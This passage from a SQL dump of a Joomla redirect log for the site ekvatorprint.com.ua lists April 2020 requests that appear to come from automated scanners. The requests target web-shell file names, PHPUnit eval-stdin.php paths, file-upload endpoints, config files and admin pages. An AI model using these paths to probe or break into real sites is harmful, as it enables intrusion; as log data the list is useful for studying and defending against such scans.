16:47:55','0000-00-00 00:00:00',301),(16510,'https://ekvatorprint.com.ua/modules/mod_araticlws/mod_atlastic.php',NULL,'http://site.ru','',6,0,'2020-04-10 17:13:20','0000-00-00 00:00:00',301),(16511,'https://ekvatorprint.com.ua/components/wp-info.php',NULL,'http://site.ru','',1,0,'2020-04-10 17:35:12','0000-00-00 00:00:00',301),(16512,'https://ekvatorprint.com.ua/templates/dd_solarsystem_64/library/gank.php.php',NULL,'http://site.ru','',2,0,'2020-04-10 17:39:02','0000-00-00 00:00:00',301),(16513,'https://ekvatorprint.com.ua/administrator/components/com_ganalytics/libraries/jquery/multiselect/mashaji2.php',NULL,'http://site.ru','',2,0,'2020-04-10 17:58:55','0000-00-00 00:00:00',301),(16514,'https://ekvatorprint.com.ua/templates/protostar/language/pm.php',NULL,'http://site.ru','',2,0,'2020-04-10 18:27:03','0000-00-00 00:00:00',301),(16515,'https://ekvatorprint.com.ua/images/minis.php',NULL,'http://site.ru','',1,0,'2020-04-10 19:29:16','0000-00-00 00:00:00',301),(16516,'https://ekvatorprint.com.ua/prov/content-post.php',NULL,'http://site.ru','',1,0,'2020-04-10 19:59:35','0000-00-00 00:00:00',301),(16517,'https://ekvatorprint.com.ua/test/simple.php5',NULL,'http://site.ru','',6,0,'2020-04-10 20:03:24','0000-00-00 00:00:00',301),(16518,'https://ekvatorprint.com.ua/images/jdownloads/screenshots/.libs.up.php.i',NULL,'http://site.ru','',3,0,'2020-04-10 20:37:12','0000-00-00 00:00:00',301),(16519,'https://ekvatorprint.com.ua/administrator/modules/mod_login/index.php',NULL,'http://site.ru','',2,0,'2020-04-10 20:54:15','0000-00-00 00:00:00',301),(16520,'https://ekvatorprint.com.ua/layouts/libraries/cms/alfav3.php',NULL,'http://site.ru','',2,0,'2020-04-10 20:55:19','0000-00-00 00:00:00',301),(16521,'https://ekvatorprint.com.ua/libraries/joomla/template/123.php',NULL,'http://site.ru','',2,0,'2020-04-10 22:34:14','0000-00-00 00:00:00',301),(16522,'https://ekvatorprint.com.ua/language/be-by/wp-muen.php',NULL,'http://site.ru','',2,0,'2020-04-10 22:56:21','0000-00-00 00:00:00',301),(16523,'https://ekvatorprint.com.ua/zen/wp-info.php',NULL,'http://site.ru','',2,0,'2020-04-10 23:18:57','0000-00-00 00:00:00',301),(16524,'https://ekvatorprint.com.ua/audio/hello.php.suspected',NULL,'http://site.ru','',2,0,'2020-04-11 07:56:10','0000-00-00 00:00:00',301),(16525,'https://ekvatorprint.com.ua/audio/feter.php.suspected',NULL,'http://site.ru','',2,0,'2020-04-11 08:24:59','0000-00-00 00:00:00',301),(16526,'https://ekvatorprint.com.ua/templates/purity_iii/html/com_content/category/gank.php.php',NULL,'http://site.ru','',1,0,'2020-04-11 08:30:59','0000-00-00 00:00:00',301),(16527,'https://ekvatorprint.com.ua/components/com_privacy/gank.php.php',NULL,'http://site.ru','',3,0,'2020-04-11 09:20:30','0000-00-00 00:00:00',301),(16528,'https://ekvatorprint.com.ua/administrator/components/com_banners/controllers/images.php',NULL,'http://site.ru','',1,0,'2020-04-11 10:56:45','0000-00-00 00:00:00',301),(16529,'https://ekvatorprint.com.ua/administrator/components/com_ninjaxplorer/ftp_tmp/0x.php',NULL,'http://site.ru','',1,0,'2020-04-11 12:42:23','0000-00-00 00:00:00',301),(16530,'https://ekvatorprint.com.ua/components/com_phocaphoto/views/image/simpleside.php5.suspected',NULL,'http://site.ru','',4,0,'2020-04-11 13:03:01','0000-00-00 00:00:00',301),(16531,'https://ekvatorprint.com.ua/nta.php',NULL,'http://site.ru','',1,0,'2020-04-11 13:30:33','0000-00-00 00:00:00',301),(16532,'https://ekvatorprint.com.ua/components/com_tags/views/ix.php.php',NULL,'http://site.ru','',2,0,'2020-04-11 14:20:09','0000-00-00 00:00:00',301),(16533,'https://ekvatorprint.com.ua/images/sampledata/parks/r.php',NULL,'http://site.ru','',1,0,'2020-04-11 16:03:14','0000-00-00 00:00:00',301),(16534,'https://ekvatorprint.com.ua/libraries/phputf8/native/mark.php',NULL,'http://site.ru','',4,0,'2020-04-11 16:13:35','0000-00-00 00:00:00',301),(16535,'https://ekvatorprint.com.ua/images/sim5.php',NULL,'http://site.ru','',3,0,'2020-04-11 16:33:22','0000-00-00 00:00:00',301),(16536,'https://ekvatorprint.com.ua/media/mailto/images.php',NULL,'http://site.ru','',1,0,'2020-04-11 16:36:26','0000-00-00 00:00:00',301),(16537,'https://ekvatorprint.com.ua/components/com_foxcontact/misel.php',NULL,'http://site.ru','',2,0,'2020-04-11 19:58:31','0000-00-00 00:00:00',301),(16538,'https://ekvatorprint.com.ua/components/com_tags/helpers/gank.php.php',NULL,'http://site.ru','',2,0,'2020-04-11 21:46:05','0000-00-00 00:00:00',301),(16539,'https://ekvatorprint.com.ua/tmp/wp-info.php',NULL,'http://site.ru','',2,0,'2020-04-11 22:03:15','0000-00-00 00:00:00',301),(16540,'https://ekvatorprint.com.ua/templates/beez5/404.php',NULL,'http://site.ru','',3,0,'2020-04-12 00:59:39','0000-00-00 00:00:00',301),(16541,'https://ekvatorprint.com.ua/administrator/components/com_joomgallery/views/category/fdgs.php',NULL,'http://site.ru','',3,0,'2020-04-12 01:10:36','0000-00-00 00:00:00',301),(16542,'https://ekvatorprint.com.ua/components/com_content/contents.php',NULL,'http://site.ru','',6,0,'2020-04-12 01:35:05','0000-00-00 00:00:00',301),(16543,'https://ekvatorprint.com.ua/tmp/hggmnm.php',NULL,'http://site.ru','',1,0,'2020-04-12 04:42:04','0000-00-00 00:00:00',301),(16544,'https://ekvatorprint.com.ua/libraries/pear/archive_tar/popup-pomo.php',NULL,'http://site.ru','',4,0,'2020-04-12 05:00:42','0000-00-00 00:00:00',301),(16545,'https://ekvatorprint.com.ua/media/editors/tinymce/plugins/wordcount/check.php',NULL,'http://site.ru','',1,0,'2020-04-12 05:56:45','0000-00-00 00:00:00',301),(16546,'https://ekvatorprint.com.ua/appsettings.json',NULL,'','',1,0,'2020-04-12 18:10:50','0000-00-00 00:00:00',301),(16547,'https://ekvatorprint.com.ua/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'','',11,0,'2020-04-14 05:36:03','0000-00-00 00:00:00',301),(16548,'https://ekvatorprint.com.ua/upgrade.php',NULL,'','',3,0,'2020-04-15 18:15:57','0000-00-00 00:00:00',301),(16549,'https://ekvatorprint.com.ua/installation/sql/databases.ini',NULL,'','',3,0,'2020-04-15 23:59:50','0000-00-00 00:00:00',301),(16550,'http://ekvatorprint.com.ua/new1/license.txt',NULL,'http://ekvatorprint.com.ua/new1/license.txt','',2,0,'2020-04-16 11:03:28','0000-00-00 00:00:00',301),(16551,'http://ekvatorprint.com.ua/1/license.txt',NULL,'http://ekvatorprint.com.ua/1/license.txt','',2,0,'2020-04-16 19:33:02','0000-00-00 00:00:00',301),(16552,'https://ekvatorprint.com.ua/laravel/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',8,0,'2020-04-17 10:38:08','0000-00-00 00:00:00',301),(16553,'https://ekvatorprint.com.ua/modules/autoupgrade/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2020-04-17 10:38:10','0000-00-00 00:00:00',301),(16554,'https://ekvatorprint.com.ua/composer/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-17 10:38:36','0000-00-00 00:00:00',301),(16555,'https://ekvatorprint.com.ua/modules/ps_facetedsearch/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',3,0,'2020-04-17 10:38:43','0000-00-00 00:00:00',301),(16556,'https://ekvatorprint.com.ua/payment/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-17 10:38:48','0000-00-00 00:00:00',301),(16557,'https://ekvatorprint.com.ua/concrete/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-17 10:38:57','0000-00-00 00:00:00',301),(16558,'https://ekvatorprint.com.ua/accounts/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-17 10:39:13','0000-00-00 00:00:00',301),(16559,'https://ekvatorprint.com.ua/blog/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',3,0,'2020-04-17 10:39:24','0000-00-00 00:00:00',301),(16560,'https://ekvatorprint.com.ua/system/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',3,0,'2020-04-17 10:39:30','0000-00-00 00:00:00',301),(16561,'https://ekvatorprint.com.ua/modules/gamification/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',3,0,'2020-04-17 10:39:51','0000-00-00 00:00:00',301),(16562,'https://ekvatorprint.com.ua/public/enjoy/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-17 10:40:02','0000-00-00 00:00:00',301),(16563,'https://ekvatorprint.com.ua/shop/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',3,0,'2020-04-17 10:40:10','0000-00-00 00:00:00',301),(16564,'https://ekvatorprint.com.ua/player/autopost/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-17 10:40:17','0000-00-00 00:00:00',301),(16565,'https://ekvatorprint.com.ua/gr/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-17 10:40:29','0000-00-00 00:00:00',301),(16566,'https://ekvatorprint.com.ua/site/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-17 10:40:42','0000-00-00 00:00:00',301),(16567,'https://ekvatorprint.com.ua/images/stories/kreativnaja-reklama/pechat-na-bannere-spor',NULL,'https://ekvatorprint.com.ua/banner-printing','',2,0,'2020-04-17 12:01:25','0000-00-00 00:00:00',301),(16568,'https://ekvatorprint.com.ua/images/stories/kreativnaja-reklama/pechat-na-bannere-seri',NULL,'https://ekvatorprint.com.ua/banner-printing','',2,0,'2020-04-17 12:01:26','0000-00-00 00:00:00',301),(16569,'https://ekvatorprint.com.ua/images/stories/kreativnaja-reklama/pechat-na-bannere-volk',NULL,'https://ekvatorprint.com.ua/banner-printing','',2,0,'2020-04-17 12:01:26','0000-00-00 00:00:00',301),(16570,'https://ekvatorprint.com.ua/images/thumbnails/images/stories/banner-big-fill-250x193.',NULL,'https://ekvatorprint.com.ua/banner-printing','',2,0,'2020-04-17 12:01:26','0000-00-00 00:00:00',301),(16571,'https://ekvatorprint.com.ua/media/plg_content_mavikthumbnails/slimbox2/css/slimbox2.c',NULL,'https://ekvatorprint.com.ua/banner-printing','',2,0,'2020-04-17 12:01:32','0000-00-00 00:00:00',301),(16572,'https://ekvatorprint.com.ua/old-wp/',NULL,'','',29,0,'2020-04-18 00:36:02','0000-00-00 00:00:00',301),(16573,'https://ekvatorprint.com.ua/old-site/',NULL,'','',29,0,'2020-04-18 00:36:03','0000-00-00 00:00:00',301),(16574,'https://ekvatorprint.com.ua/bak/',NULL,'','',29,0,'2020-04-18 00:36:07','0000-00-00 00:00:00',301),(16575,'https://ekvatorprint.com.ua/sito/',NULL,'','',4,0,'2020-04-18 00:36:07','0000-00-00 00:00:00',301),(16576,'https://ekvatorprint.com.ua/2020/',NULL,'','',29,0,'2020-04-18 00:36:09','0000-00-00 00:00:00',301),(16577,'https://ekvatorprint.com.ua/+/',NULL,'','',4,0,'2020-04-18 00:36:09','0000-00-00 00:00:00',301),(16578,'http://ekvatorprint.com.ua/b/license.txt',NULL,'http://ekvatorprint.com.ua/b/license.txt','',1,0,'2020-04-18 09:35:14','0000-00-00 00:00:00',301),(16579,'https://ekvatorprint.com.ua/wp-check.php',NULL,'','',3,0,'2020-04-18 12:53:24','0000-00-00 00:00:00',301),(16580,'http://ekvatorprint.com.ua/bl/license.txt',NULL,'http://ekvatorprint.com.ua/bl/license.txt','',1,0,'2020-04-18 14:19:05','0000-00-00 00:00:00',301),(16581,'https://ekvatorprint.com.ua/raiz0.html',NULL,'','',1,0,'2020-04-18 14:44:48','0000-00-00 00:00:00',301),(16582,'https://ekvatorprint.com.ua/minus.php',NULL,'','',1,0,'2020-04-18 14:47:02','0000-00-00 00:00:00',301),(16583,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/mudxizxnc.php',NULL,'','',1,0,'2020-04-18 14:47:36','0000-00-00 00:00:00',301),(16584,'https://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/mudxizxnc.php',NULL,'','',1,0,'2020-04-18 14:48:59','0000-00-00 00:00:00',301),(16585,'https://ekvatorprint.com.ua/components/com_sexycontactform/fileupload/files/mudxizxnc.php',NULL,'','',1,0,'2020-04-18 14:50:43','0000-00-00 00:00:00',301),(16586,'http://ekvatorprint.com.ua/blogs/license.txt',NULL,'http://ekvatorprint.com.ua/blogs/license.txt','',1,0,'2020-04-18 18:53:15','0000-00-00 00:00:00',301),(16587,'http://ekvatorprint.com.ua/theblog/license.txt',NULL,'http://ekvatorprint.com.ua/theblog/license.txt','',1,0,'2020-04-18 23:14:37','0000-00-00 00:00:00',301),(16588,'http://ekvatorprint.com.ua/test1/license.txt',NULL,'http://ekvatorprint.com.ua/test1/license.txt','',1,0,'2020-04-19 01:40:18','0000-00-00 00:00:00',301),(16589,'http://ekvatorprint.com.ua/misc/print.css',NULL,'http://www.google.com/','',2,0,'2020-04-19 04:28:24','0000-00-00 00:00:00',301),(16590,'https://ekvatorprint.com.ua/workspace/drupal/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-19 09:32:00','0000-00-00 00:00:00',301),(16591,'https://ekvatorprint.com.ua/drupal/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-19 09:32:10','0000-00-00 00:00:00',301),(16592,'https://ekvatorprint.com.ua/sites/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-19 09:32:18','0000-00-00 00:00:00',301),(16593,'https://ekvatorprint.com.ua/sites/default/libraries/mailchimp/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2020-04-19 09:32:25','0000-00-00 00:00:00',301),(16594,'https://ekvatorprint.com.ua/app/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-04-19 18:22:17','0000-00-00 00:00:00',301),(16595,'https://ekvatorprint.com.ua/public/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-04-19 18:22:20','0000-00-00 00:00:00',301),(16596,'https://ekvatorprint.com.ua/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-04-19 18:22:32','0000-00-00 00:00:00',301),(16597,'https://ekvatorprint.com.ua/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-04-19 18:22:35','0000-00-00 00:00:00',301),(16598,'https://ekvatorprint.com.ua/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-04-19 18:22:38','0000-00-00 00:00:00',301),(16599,'https://ekvatorprint.com.ua/admin/index.php',NULL,'','',16,0,'2020-04-19 19:17:34','0000-00-00 00:00:00',301),(16600,'http://ekvatorprint.com.ua/2020/license.txt',NULL,'http://ekvatorprint.com.ua/2020/license.txt','',1,0,'2020-04-20 06:03:43','0000-00-00 00:00:00',301),(16601,'http://ekvatorprint.com.ua/2019/license.txt',NULL,'http://ekvatorprint.com.ua/2019/license.txt','',1,0,'2020-04-20 09:50:58','0000-00-00 00:00:00',301),(16602,'https://ekvatorprint.com.ua/kcfinder/upload.php',NULL,'','',3,0,'2020-04-20 11:17:07','0000-00-00 00:00:00',301),(16603,'https://ekvatorprint.com.ua/admin/js/kcfinder/upload.php',NULL,'','',1,0,'2020-04-20 11:17:09','0000-00-00 00:00:00',301),(16604,'https://ekvatorprint.com.ua/admin/editor/kcfinder/upload.php',NULL,'','',1,0,'2020-04-20 11:17:10','0000-00-00 00:00:00',301),(16605,'https://ekvatorprint.com.ua/js/kcfinder/upload.php',NULL,'','',3,0,'2020-04-20 11:17:11','0000-00-00 00:00:00',301),(16606,'https://ekvatorprint.com.ua/admin/kcfinder/upload.php',NULL,'','',2,0,'2020-04-20 11:17:13','0000-00-00 00:00:00',301),(16607,'https://ekvatorprint.com.ua/includes/js/kcfinder/upload.php',NULL,'','',1,0,'2020-04-20 11:17:14','0000-00-00 00:00:00',301),(16608,'https://ekvatorprint.com.ua/tiny_mce/plugins/kcfinder/upload.php',NULL,'','',1,0,'2020-04-20 11:17:16','0000-00-00 00:00:00',301),(16609,'https://ekvatorprint.com.ua/lib/kcfinder/upload.php',NULL,'','',1,0,'2020-04-20 11:17:17','0000-00-00 00:00:00',301),(16610,'https://ekvatorprint.com.ua/admin/ckeditor/kcfinder/upload.php',NULL,'','',1,0,'2020-04-20 11:17:17','0000-00-00 00:00:00',301),(16611,'https://ekvatorprint.com.ua/ckeditor/kcfinder/upload.php',NULL,'','',1,0,'2020-04-20 11:17:18','0000-00-00 00:00:00',301),(16612,'https://ekvatorprint.com.ua/assets/kcfinder/upload.php',NULL,'','',2,0,'2020-04-20 11:17:19','0000-00-00 00:00:00',301),(16613,'https://ekvatorprint.com.ua/asset/kcfinder/upload.php',NULL,'','',2,0,'2020-04-20 11:17:20','0000-00-00 00:00:00',301),(16614,'https://ekvatorprint.com.ua/ckeditor/plugins/kcfinder/upload.php',NULL,'','',2,0,'2020-04-20 11:17:21','0000-00-00 00:00:00',301),(16615,'https://ekvatorprint.com.ua/vendor/kcfinder/upload.php',NULL,'','',1,0,'2020-04-20 11:17:23','0000-00-00 00:00:00',301),(16616,'https://ekvatorprint.com.ua/assets/js/kcfinder/upload.php',NULL,'','',3,0,'2020-04-20 11:17:24','0000-00-00 00:00:00',301),(16617,'https://ekvatorprint.com.ua/plugins/kcfinder/upload.php',NULL,'','',2,0,'2020-04-20 11:17:25','0000-00-00 00:00:00',301),(16618,'https://ekvatorprint.com.ua/assets/ckeditor/kcfinder/upload.php',NULL,'','',1,0,'2020-04-20 11:17:26','0000-00-00 00:00:00',301),(16619,'https://ekvatorprint.com.ua/themes/admin/js/kcfinder/upload.php',NULL,'','',1,0,'2020-04-20 11:17:27','0000-00-00 00:00:00',301),(16620,'https://ekvatorprint.com.ua/assets/admin/js/kcfinder/upload.php',NULL,'','',1,0,'2020-04-20 11:17:28','0000-00-00 00:00:00',301),(16621,'https://ekvatorprint.com.ua/panel/kcfinder/upload.php',NULL,'','',1,0,'2020-04-20 11:17:29','0000-00-00 00:00:00',301),(16622,'http://ekvatorprint.com.ua/2018/license.txt',NULL,'http://ekvatorprint.com.ua/2018/license.txt','',1,0,'2020-04-20 14:08:35','0000-00-00 00:00:00',301),(16623,'http://ekvatorprint.com.ua/2017/license.txt',NULL,'http://ekvatorprint.com.ua/2017/license.txt','',1,0,'2020-04-20 18:39:22','0000-00-00 00:00:00',301),(16624,'http://ekvatorprint.com.ua/2016/license.txt',NULL,'http://ekvatorprint.com.ua/2016/license.txt','',1,0,'2020-04-20 23:12:15','0000-00-00 00:00:00',301),(16625,'https://ekvatorprint.com.ua/xmlrpc-blog.php',NULL,'','',3,0,'2020-04-21 00:00:39','0000-00-00 00:00:00',301),(16626,'https://ekvatorprint.com.ua/plugins/content/apismtp/josmtpapi.php.suspected?test=hello',NULL,'','',3,0,'2020-04-21 03:20:56','0000-00-00 00:00:00',301),(16627,'https://ekvatorprint.com.ua/wp-content/plugins/apikey/josmtpapi.php.suspected?test=hello',NULL,'','',3,0,'2020-04-21 03:21:01','0000-00-00 00:00:00',301),(16628,'https://ekvatorprint.com.ua/wp-content/plugins/apikey/josmtpapi.php?test=hello',NULL,'','',3,0,'2020-04-21 03:21:11','0000-00-00 00:00:00',301),(16629,'https://ekvatorprint.com.ua/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',2,0,'2020-04-21 03:21:12','0000-00-00 00:00:00',301),(16630,'https://ekvatorprint.com.ua/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'','',9,0,'2020-04-21 03:21:15','0000-00-00 00:00:00',301),(16631,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',4,0,'2020-04-21 03:21:16','0000-00-00 00:00:00',301),(16632,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/apikey/apikey.php.suspected?test=hello/wp/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',3,0,'2020-04-21 03:21:19','0000-00-00 00:00:00',301),(16633,'https://ekvatorprint.com.ua/aipkey.php?test=hello',NULL,'','',3,0,'2020-04-21 03:21:20','0000-00-00 00:00:00',301),(16634,'https://ekvatorprint.com.ua/images/aipkey.php?test=hello',NULL,'','',3,0,'2020-04-21 03:21:22','0000-00-00 00:00:00',301),(16635,'https://ekvatorprint.com.ua/bitrix/admin/htmleditor2/aipkey.php?test=hello',NULL,'','',3,0,'2020-04-21 03:21:24','0000-00-00 00:00:00',301),(16636,'https://ekvatorprint.com.ua/sites/all/themes/views/views.php?test=hello',NULL,'','',3,0,'2020-04-21 03:21:27','0000-00-00 00:00:00',301),(16637,'https://ekvatorprint.com.ua/wp-content/uploads/zgepd_oddsd.php?test=hello',NULL,'','',3,0,'2020-04-21 03:21:28','0000-00-00 00:00:00',301),(16638,'https://ekvatorprint.com.ua/aipkey.php.suspected?test=hello',NULL,'','',3,0,'2020-04-21 03:21:29','0000-00-00 00:00:00',301),(16639,'https://ekvatorprint.com.ua/images/aipkey.php.suspected?test=hello',NULL,'','',3,0,'2020-04-21 03:21:31','0000-00-00 00:00:00',301),(16640,'http://ekvatorprint.com.ua/2015/license.txt',NULL,'http://ekvatorprint.com.ua/2015/license.txt','',1,0,'2020-04-21 03:59:41','0000-00-00 00:00:00',301),(16641,'http://ekvatorprint.com.ua/2014/license.txt',NULL,'http://ekvatorprint.com.ua/2014/license.txt','',1,0,'2020-04-21 08:55:40','0000-00-00 00:00:00',301),(16642,'https://ekvatorprint.com.ua/laravel/composer.json',NULL,'','',1,0,'2020-04-21 20:29:06','0000-00-00 00:00:00',301),(16643,'http://ekvatorprint.com.ua/backup/license.txt',NULL,'http://ekvatorprint.com.ua/backup/license.txt','',1,0,'2020-04-22 01:00:44','0000-00-00 00:00:00',301),(16644,'https://ekvatorprint.com.ua/plupload/examples/upload.php',NULL,'','',2,0,'2020-04-23 05:03:30','0000-00-00 00:00:00',301),(16645,'https://ekvatorprint.com.ua/test/blackhat.php',NULL,'http://site.ru','',2,0,'2020-04-23 21:49:15','0000-00-00 00:00:00',301),(16646,'https://ekvatorprint.com.ua/web/simple.php5',NULL,'http://site.ru','',2,0,'2020-04-23 23:10:59','0000-00-00 00:00:00',301),(16647,'https://ekvatorprint.com.ua/neter.php.suspected',NULL,'http://site.ru','',4,0,'2020-04-24 03:54:09','0000-00-00 00:00:00',301),(16648,'https://ekvatorprint.com.ua/admin/administrator/index.php',NULL,'http://ekvatorprint.com.ua/admin/administrator/index.php','',1,0,'2020-04-24 07:12:32','0000-00-00 00:00:00',301),(16649,'https://ekvatorprint.com.ua/cms/administrator/index.php',NULL,'http://ekvatorprint.com.ua/cms/administrator/index.php','',1,0,'2020-04-24 07:23:48','0000-00-00 00:00:00',301),(16650,'https://ekvatorprint.com.ua/blog/administrator/index.php',NULL,'http://ekvatorprint.com.ua/blog/administrator/index.php','',1,0,'2020-04-24 07:35:51','0000-00-00 00:00:00',301),(16651,'https://ekvatorprint.com.ua/web/administrator/index.php',NULL,'http://ekvatorprint.com.ua/web/administrator/index.php','',1,0,'2020-04-24 07:47:19','0000-00-00 00:00:00',301),(16652,'https://ekvatorprint.com.ua/site/administrator/index.php',NULL,'http://ekvatorprint.com.ua/site/administrator/index.php','',1,0,'2020-04-24 07:58:52','0000-00-00 00:00:00',301),(16653,'https://ekvatorprint.com.ua/store/administrator/index.php',NULL,'http://ekvatorprint.com.ua/store/administrator/index.php','',1,0,'2020-04-24 08:44:49','0000-00-00 00:00:00',301),(16654,'https://ekvatorprint.com.ua/joomla/administrator/index.php',NULL,'http://ekvatorprint.com.ua/joomla/administrator/index.php','',1,0,'2020-04-24 08:55:57','0000-00-00 00:00:00',301),(16655,'https://ekvatorprint.com.ua/test/administrator/index.php',NULL,'http://ekvatorprint.com.ua/test/administrator/index.php','',1,0,'2020-04-24 09:07:51','0000-00-00 00:00:00',301),(16656,'https://ekvatorprint.com.ua/components/com_contact/views/category/tmpl/fail_logs.php',NULL,'http://site.ru','',6,0,'2020-04-24 09:19:29','0000-00-00 00:00:00',301),(16657,'https://ekvatorprint.com.ua/joomla2/administrator/index.php',NULL,'http://ekvatorprint.com.ua/joomla2/administrator/index.php','',1,0,'2020-04-24 09:19:39','0000-00-00 00:00:00',301),(16658,'https://ekvatorprint.com.ua/new/administrator/index.php',NULL,'http://ekvatorprint.com.ua/new/administrator/index.php','',1,0,'2020-04-24 09:31:42','0000-00-00 00:00:00',301),(16659,'https://ekvatorprint.com.ua/user/administrator/index.php',NULL,'http://ekvatorprint.com.ua/user/administrator/index.php','',1,0,'2020-04-24 09:42:58','0000-00-00 00:00:00',301),(16660,'https://ekvatorprint.com.ua/forum/main-forum',NULL,'','',1,0,'2020-04-25 14:03:10','0000-00-00 00:00:00',301),(16661,'https://ekvatorprint.com.ua/mod_ariimageslidersa.php',NULL,'http://site.ru','',5,0,'2020-04-25 15:57:56','0000-00-00 00:00:00',301),(16662,'https://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/wp-console.php.suspected',NULL,'http://site.ru','',2,0,'2020-04-25 16:01:14','0000-00-00 00:00:00',301),(16663,'https://ekvatorprint.com.ua/.smileys/systems.php',NULL,'http://site.ru','',4,0,'2020-04-25 16:20:33','0000-00-00 00:00:00',301),(16664,'https://ekvatorprint.com.ua/templates/protostar/css/wp-aespa.php',NULL,'http://site.ru','',2,0,'2020-04-25 16:47:57','0000-00-00 00:00:00',301),(16665,'https://ekvatorprint.com.ua/administrator/components/com_admin/sql/updates/postgresql/ix.php.php',NULL,'http://site.ru','',3,0,'2020-04-25 19:38:26','0000-00-00 00:00:00',301),(16666,'https://ekvatorprint.com.ua/lndex.php',NULL,'http://site.ru','',2,0,'2020-04-25 19:38:52','0000-00-00 00:00:00',301),(16667,'https://ekvatorprint.com.ua/xgasupx.php',NULL,'http://site.ru','',3,0,'2020-04-25 22:24:48','0000-00-00 00:00:00',301),(16668,'https://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/emotions/ob.php',NULL,'http://site.ru','',2,0,'2020-04-25 23:38:33','0000-00-00 00:00:00',301),(16669,'https://ekvatorprint.com.ua/scc.php',NULL,'http://site.ru','',2,0,'2020-04-26 00:44:27','0000-00-00 00:00:00',301),(16670,'https://ekvatorprint.com.ua/index.php/forum/main-forum',NULL,'','',1,0,'2020-04-26 01:27:06','0000-00-00 00:00:00',301),(16671,'https://ekvatorprint.com.ua/ler.php',NULL,'http://site.ru','',5,0,'2020-04-26 05:16:55','0000-00-00 00:00:00',301),(16672,'https://ekvatorprint.com.ua/ekomi/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-04-26 06:26:45','0000-00-00 00:00:00',301),(16673,'https://ekvatorprint.com.ua/assets/global/plugins/jquery-file-upload/server/php/index.php?secure=1',NULL,'','',2,0,'2020-04-26 17:07:55','0000-00-00 00:00:00',301),(16674,'https://ekvatorprint.com.ua/assets/plugins/jquery-file-upload/server/php/index.php?secure=1',NULL,'','',2,0,'2020-04-26 17:07:57','0000-00-00 00:00:00',301),(16675,'https://ekvatorprint.com.ua/assets/jquery-file-upload/server/php/index.php?secure=1',NULL,'','',2,0,'2020-04-26 17:07:58','0000-00-00 00:00:00',301),(16676,'https://ekvatorprint.com.ua/templates/system/wp-aespa.php',NULL,'http://site.ru','',1,0,'2020-04-26 20:15:13','0000-00-00 00:00:00',301),(16677,'https://ekvatorprint.com.ua/plugins/content/apismtp/vzadri.php',NULL,'http://site.ru','',4,0,'2020-04-26 20:54:11','0000-00-00 00:00:00',301),(16678,'https://ekvatorprint.com.ua/wp-sig.php',NULL,'http://site.ru','',2,0,'2020-04-27 03:28:01','0000-00-00 00:00:00',301),(16679,'https://ekvatorprint.com.ua/verygs.php',NULL,'http://site.ru','',32,0,'2020-04-27 04:21:12','0000-00-00 00:00:00',301),(16680,'https://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/content-post.php',NULL,'http://site.ru','',5,0,'2020-04-27 05:38:32','0000-00-00 00:00:00',301),(16681,'https://ekvatorprint.com.ua/components/com_foxcontact/zc.php.suspected',NULL,'http://site.ru','',4,0,'2020-04-28 17:52:52','0000-00-00 00:00:00',301),(16682,'https://ekvatorprint.com.ua/updatecore/popup-pomo.php',NULL,'http://site.ru','',4,0,'2020-04-28 18:23:28','0000-00-00 00:00:00',301),(16683,'https://ekvatorprint.com.ua/cache/simple.php5.suspected',NULL,'http://site.ru','',23,0,'2020-04-28 21:44:27','0000-00-00 00:00:00',301),(16684,'https://ekvatorprint.com.ua/wp-content/uploads/2019/03/simple.php5',NULL,'http://site.ru','',1,0,'2020-04-28 23:19:58','0000-00-00 00:00:00',301),(16685,'https://ekvatorprint.com.ua/sites/all/libraries/ofcv1/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2020-04-29 05:18:13','0000-00-00 00:00:00',301),(16686,'https://ekvatorprint.com.ua/wpa.php',NULL,'http://site.ru','',5,0,'2020-04-29 05:41:56','0000-00-00 